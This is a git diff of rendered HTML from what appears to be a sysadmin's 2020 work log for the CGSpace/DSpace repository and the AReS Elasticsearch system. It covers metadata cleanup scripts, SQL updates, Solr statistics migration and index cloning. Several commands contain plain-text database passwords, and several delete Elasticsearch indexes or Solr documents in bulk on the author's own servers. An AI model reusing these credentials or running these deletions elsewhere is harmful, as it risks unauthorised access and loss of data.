        • I have no idea why they wouldn’t have been caught yesterday when I originally ran the script on a clean AReS with no mappings… @@ -1148,10 +1148,10 @@ $ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | u
      -
      $ cat /tmp/elasticsearch-mappings* > /tmp/new-elasticsearch-mappings.txt
      -$ curl -XDELETE http://localhost:9200/openrxv-values
      -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/new-elasticsearch-mappings.txt
      -
        +
        $ cat /tmp/elasticsearch-mappings* > /tmp/new-elasticsearch-mappings.txt
        +$ curl -XDELETE http://localhost:9200/openrxv-values
        +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/new-elasticsearch-mappings.txt
        +
        • The latest indexing (second for today!) finally finshed on AReS and the countries and affiliations/crps/journals all look MUCH better
          • There are still a few acronyms present, some of which are in the value mappings and some which aren’t
          • @@ -1160,7 +1160,7 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H dspace=# BEGIN; -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]'; +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]'; UPDATE 123 dspace=# COMMIT;
        @@ -1198,10 +1198,10 @@ $ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
    • Then I did a test to apply the corrections and deletions on my local DSpace:
    -
    $ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
    -$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
    -$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
    -$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
    +
    $ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
    +$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
    +$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
    +$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
     
    • I will wait to apply them on CGSpace when I have all the other corrections from Peter processed
    @@ -1214,8 +1214,8 @@ $ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace
  • Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:
  • -
    $ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
    -$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
    +
    $ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
    +$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
     
    • I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:
    diff --git a/docs/2020-11/index.html b/docs/2020-11/index.html index 8a02769d6..7f205eba1 100644 --- a/docs/2020-11/index.html +++ b/docs/2020-11/index.html @@ -32,7 +32,7 @@ So far we’ve spent at least fifty hours to process the statistics and stat "/> - + @@ -150,8 +150,8 @@ So far we’ve spent at least fifty hours to process the statistics and stat -
    $ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
    -$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
    +$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     
    • Then I started a Discovery re-index on CGSpace:
    @@ -191,7 +191,7 @@ sys 2m26.931s
  • Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:
  • dspace=# BEGIN;
    -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
    +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
     UPDATE 164
     dspace=# COMMIT;
     
      @@ -314,8 +314,8 @@ $ git checkout origin/6_x-dev-atmire-modules $ npm install -g yarn $ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package $ sudo su - postgres -$ psql dspace -c 'CREATE EXTENSION pgcrypto;' -$ psql dspace -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" +$ psql dspace -c 'CREATE EXTENSION pgcrypto;' +$ psql dspace -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" $ exit $ rm -rf /home/cgspace/config/spring $ ant update @@ -338,7 +338,7 @@ $ sudo systemctl start tomcat7 # pg_upgradecluster 9.6 main # pg_dropcluster 9.6 main # systemctl start postgresql -# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r +# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
    • Then I ran all system updates and rebooted the server…
    • After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated
    • @@ -372,13 +372,13 @@ Error sending email:
    • I copied the mail.extraproperties = mail.smtp.starttls.enable=true setting from the old DSpace 5 dspace.cfg and now the emails are working
    • After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
     $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
     
    • After about 6,000,000 records I got the same error that I’ve gotten every time I test this migration process:
    -
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -407,7 +407,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
     
    • There are almost 1,500 locks:
    -
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
    +
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
     1494
     
    • I sent a mail to the dspace-tech mailing list to ask for help… @@ -454,8 +454,8 @@ java.lang.OutOfMemoryError: Java heap space
    -
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +
    Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -486,7 +486,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
     
    • There are over 2,000 locks:
    -
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
    +
    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
     2071
     

    2020-11-18

      @@ -603,7 +603,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
    -
    dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
     COPY 87411
     
    • Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API
    • @@ -688,11 +688,11 @@ COPY 87411
    -
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
    +
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
     
    • IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-11-30-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-11-30-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    @@ -701,15 +701,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
     
     
    $ cat 2020-11-30-fix-hung-orcid.csv
     cg.creator.id,correct
    -"Hung Nguyen-Viet: 0000-0001-9877-0596","Hung Nguyen-Viet: 0000-0003-1549-2733"
    -"Adriana Tofiño: 0000-0001-7115-7169","Adriana Tofiño Rivera: 0000-0001-7115-7169"
    -"Cristhian Puerta Rodriguez: 0000-0001-5992-1697","David Puerta: 0000-0001-5992-1697"
    -"Ermias Betemariam: 0000-0002-1955-6995","Ermias Aynekulu: 0000-0002-1955-6995"
    -"Hirut Betaw: 0000-0002-1205-3711","Betaw Hirut: 0000-0002-1205-3711"
    -"Megan Zandstra: 0000-0002-3326-6492","Megan McNeil Zandstra: 0000-0002-3326-6492"
    -"Tolu Eyinla: 0000-0003-1442-4392","Toluwalope Emmanuel: 0000-0003-1442-4392"
    -"VInay Nangia: 0000-0001-5148-8614","Vinay Nangia: 0000-0001-5148-8614"
    -$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
    +"Hung Nguyen-Viet: 0000-0001-9877-0596","Hung Nguyen-Viet: 0000-0003-1549-2733"
    +"Adriana Tofiño: 0000-0001-7115-7169","Adriana Tofiño Rivera: 0000-0001-7115-7169"
    +"Cristhian Puerta Rodriguez: 0000-0001-5992-1697","David Puerta: 0000-0001-5992-1697"
    +"Ermias Betemariam: 0000-0002-1955-6995","Ermias Aynekulu: 0000-0002-1955-6995"
    +"Hirut Betaw: 0000-0002-1205-3711","Betaw Hirut: 0000-0002-1205-3711"
    +"Megan Zandstra: 0000-0002-3326-6492","Megan McNeil Zandstra: 0000-0002-3326-6492"
    +"Tolu Eyinla: 0000-0003-1442-4392","Toluwalope Emmanuel: 0000-0003-1442-4392"
    +"VInay Nangia: 0000-0001-5148-8614","Vinay Nangia: 0000-0001-5148-8614"
    +$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
     
    diff --git a/docs/2020-12/index.html b/docs/2020-12/index.html index 1f197d3a3..e0d11a6a3 100644 --- a/docs/2020-12/index.html +++ b/docs/2020-12/index.html @@ -36,7 +36,7 @@ I started processing those (about 411,000 records): "/> - + @@ -132,8 +132,8 @@ I started processing those (about 411,000 records): -
    $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
    -
      +
      $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
      +
      • AReS went down when the renew-letsencrypt service stopped the angular_nginx container in the pre-update hook and failed to bring it back up
        • I ran all system updates on the host and rebooted it and AReS came back up OK
        • @@ -153,7 +153,7 @@ I started processing those (about 411,000 records):
        $ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
         $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
        -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
        +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
         
        • I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)
        • I finished migrating all the statistics from the yearly shards back to the main core
        • @@ -179,21 +179,21 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
          • First the 2010 core:
          -
          $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
          -$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
          -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
          -
            +
            $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
            +$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
            +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
            +
            • Judging by the DSpace logs all these cores had a problem starting up in the last month:
            -
            # grep -rsI "Unable to create core" [dspace]/log/dspace.log.2020-* | grep -o -E "statistics-[0-9]+" | sort | uniq -c
            -     24 statistics-2010
            -     24 statistics-2015
            -     18 statistics-2016
            -      6 statistics-2018
            -
              +
              # grep -rsI "Unable to create core" [dspace]/log/dspace.log.2020-* | grep -o -E "statistics-[0-9]+" | sort | uniq -c
              +     24 statistics-2010
              +     24 statistics-2015
              +     18 statistics-2016
              +      6 statistics-2018
              +
              • The message is always this:
              -
              org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
              +
              org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
               
              • I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them
                  @@ -223,9 +223,9 @@ $ curl -s "http://localhost:8081/solr/statistics
                  • There are apparently 1,700 locks right now:
                  -
                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                  -1739
                  -

                  2020-12-08

                  +
                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                  +1739
                  +

                  2020-12-08

                  • Atmire sent some instructions for using the DeduplicateValuesProcessor
                      @@ -233,7 +233,7 @@ $ curl -s "http://localhost:8081/solr/statistics
                  -
                  Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
                  +
                  Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
                   com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
                           at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
                           at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
                  @@ -341,22 +341,22 @@ Caused by: org.apache.http.TruncatedChunkException: Truncated chunk ( expected s
                   
                  • I can see it in the openrxv-items-final index:
                  -
                  $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*' | json_pp
                  -{
                  -   "_shards" : {
                  -      "failed" : 0,
                  -      "skipped" : 0,
                  -      "successful" : 1,
                  -      "total" : 1
                  -   },
                  -   "count" : 299922
                  -}
                  -
                    +
                    $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*' | json_pp
                    +{
                    +   "_shards" : {
                    +      "failed" : 0,
                    +      "skipped" : 0,
                    +      "successful" : 1,
                    +      "total" : 1
                    +   },
                    +   "count" : 299922
                    +}
                    +
                    $ curl -XDELETE http://localhost:9200/openrxv-items-final
                    -{"acknowledged":true}%
                    +{"acknowledged":true}%
                     
                    • Moayad said he’s working on the harvesting so I stopped it for now to re-deploy his latest changes
                    • I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server
                    • @@ -371,8 +371,8 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
                  -
                  localhost/dspace63= > SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-[0-9]{2}-*';
                  -

                  2020-12-14

                  +
                  localhost/dspace63= > SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-[0-9]{2}-*';
                  +

                  2020-12-14

                  • The re-harvesting finished last night on AReS but there are no records in the openrxv-items-final index
                      @@ -380,62 +380,62 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
                  -
                  $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | json_pp
                  -{
                  -   "count" : 99992,
                  -   "_shards" : {
                  -      "skipped" : 0,
                  -      "total" : 1,
                  -      "failed" : 0,
                  -      "successful" : 1
                  -   }
                  -}
                  -
                    +
                    $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | json_pp
                    +{
                    +   "count" : 99992,
                    +   "_shards" : {
                    +      "skipped" : 0,
                    +      "total" : 1,
                    +      "failed" : 0,
                    +      "successful" : 1
                    +   }
                    +}
                    +
                    • I’m going to try to clone the temp index to the final one…
                      • First, set the openrxv-items-temp index to block writes (read only) and then clone it to openrxv-items-final:
                    -
                    $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                    -{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final"}
                    -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                    -
                      +
                      $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                      +{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final"}
                      +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                      +
                      • Now I see that the openrxv-items-final index has items, but there are still none in AReS Explorer UI!
                      -
                      $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                      -{
                      -  "count" : 99992,
                      -  "_shards" : {
                      -    "total" : 1,
                      -    "successful" : 1,
                      -    "skipped" : 0,
                      -    "failed" : 0
                      -  }
                      -}
                      -
                        +
                        $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                        +{
                        +  "count" : 99992,
                        +  "_shards" : {
                        +    "total" : 1,
                        +    "successful" : 1,
                        +    "skipped" : 0,
                        +    "failed" : 0
                        +  }
                        +}
                        +
                        • The api logs show this from last night after the harvesting:
                        -
                        [Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
                        -[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
                        -[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
                        -[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
                        -(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
                        -    at IncomingMessage.<anonymous> (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
                        -    at IncomingMessage.emit (events.js:326:22)
                        -    at endReadableNT (_stream_readable.js:1223:12)
                        -    at processTicksAndRejections (internal/process/task_queues.js:84:21)
                        -
                          +
                          [Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
                          +[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
                          +[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
                          +[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
                          +(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
                          +    at IncomingMessage.<anonymous> (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
                          +    at IncomingMessage.emit (events.js:326:22)
                          +    at endReadableNT (_stream_readable.js:1223:12)
                          +    at processTicksAndRejections (internal/process/task_queues.js:84:21)
                          +
                          • But I’m not sure why the frontend doesn’t show any data despite there being documents in the index…
                          • I talked to Moayad and he reminded me that OpenRXV uses an alias to point to temp and final indexes, but the UI actually uses the openrxv-items index
                          • I cloned the openrxv-items-final index to openrxv-items index and now I see items in the explorer UI
                          • The PDF report was broken and I looked in the API logs and saw this:
                          -
                          (node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
                          -    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
                          -    at processTicksAndRejections (internal/process/task_queues.js:97:5)
                          -
                            +
                            (node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
                            +    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
                            +    at processTicksAndRejections (internal/process/task_queues.js:97:5)
                            +
                            • I installed unoconv in the backend api container and now it works… but I wonder why this changed…
                            • Skype with Abenet and Peter to discuss AReS that will be shown to ILRI scientists this week
                                @@ -457,11 +457,11 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                            -
                            $ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=0' | json_pp > /tmp/policy1.json
                            -$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=100' | json_pp > /tmp/policy2.json
                            -$ query-json '.items | length' /tmp/policy1.json
                            +
                            $ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=0' | json_pp > /tmp/policy1.json
                            +$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=100' | json_pp > /tmp/policy2.json
                            +$ query-json '.items | length' /tmp/policy1.json
                             100
                            -$ query-json '.items | length' /tmp/policy2.json
                            +$ query-json '.items | length' /tmp/policy2.json
                             32
                             
                          -
                          $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                          -

                          2020-12-15

                          +
                          $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                          +

                          2020-12-15

                          • After the re-harvest last night there were 200,000 items in the openrxv-items-temp index again
                              @@ -499,36 +499,36 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                            • I checked the 1,534 fixes in Open Refine (had to fix a few UTF-8 errors, as always from Peter’s CSVs) and then applied them using the fix-metadata-values.py script:
                            -
                            $ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                            -$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
                            -
                              +
                              $ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                              +$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
                              +
                              • Since I was re-indexing Discovery anyways I decided to check for any uppercase AGROVOC and lowercase them:
                              -
                              dspace=# BEGIN;
                              -BEGIN
                              -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
                              -UPDATE 406
                              -dspace=# COMMIT;
                              -COMMIT
                              -
                                +
                                dspace=# BEGIN;
                                +BEGIN
                                +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
                                +UPDATE 406
                                +dspace=# COMMIT;
                                +COMMIT
                                +
                                • I also updated the Font Awesome icon classes for version 5 syntax:
                                -
                                dspace=# BEGIN;
                                -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-rss','fas fa-rss', 'g') WHERE text_value LIKE '%fa fa-rss%';
                                -UPDATE 74
                                -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-at','fas fa-at', 'g') WHERE text_value LIKE '%fa fa-at%';
                                -UPDATE 74
                                -dspace=# COMMIT;
                                -
                                  +
                                  dspace=# BEGIN;
                                  +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-rss','fas fa-rss', 'g') WHERE text_value LIKE '%fa fa-rss%';
                                  +UPDATE 74
                                  +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-at','fas fa-at', 'g') WHERE text_value LIKE '%fa fa-at%';
                                  +UPDATE 74
                                  +dspace=# COMMIT;
                                  +
                                  • Then I started a full Discovery re-index:
                                  -
                                  $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
                                  -$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                  -
                                  -real    265m11.224s
                                  -user    171m29.141s
                                  -sys     2m41.097s
                                  -
                                    +
                                    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
                                    +$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                    +
                                    +real    265m11.224s
                                    +user    171m29.141s
                                    +sys     2m41.097s
                                    +
